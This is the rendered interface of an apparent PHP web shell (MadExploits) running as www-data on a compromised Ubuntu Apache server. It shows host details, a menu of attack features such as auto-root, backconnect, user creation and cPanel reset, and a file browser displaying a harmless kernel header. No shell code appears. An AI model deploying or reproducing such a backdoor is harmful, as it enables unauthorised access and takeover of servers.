Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 104.23.253.147
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
src /
linux-headers-5.4.0-198 /
include /
soc /
at91 /
[ HOME SHELL ]
Name
Size
Permission
Action
at91sam9_ddrsdr.h
5.99
KB
-rw-r--r--
at91sam9_sdramc.h
3.48
KB
-rw-r--r--
atmel-secumod.h
418
B
-rw-r--r--
atmel-sfr.h
1.76
KB
-rw-r--r--
atmel_tcb.h
11.34
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : atmel-secumod.h
/* SPDX-License-Identifier: GPL-2.0-only */ /* * Atmel Security Module register offsets and bit definitions. * * Copyright (C) 2016 Atmel * * Author: Alexandre Belloni <alexandre.belloni@free-electrons.com> */ #ifndef _LINUX_SOC_AT91_ATMEL_SECUMOD_H #define _LINUX_SOC_AT91_ATMEL_SECUMOD_H #define AT91_SECUMOD_RAMRDY 0x14 #define AT91_SECUMOD_RAMRDY_READY BIT(0) #endif /* _LINUX_SOC_AT91_ATMEL_SECUMOD_H */
Close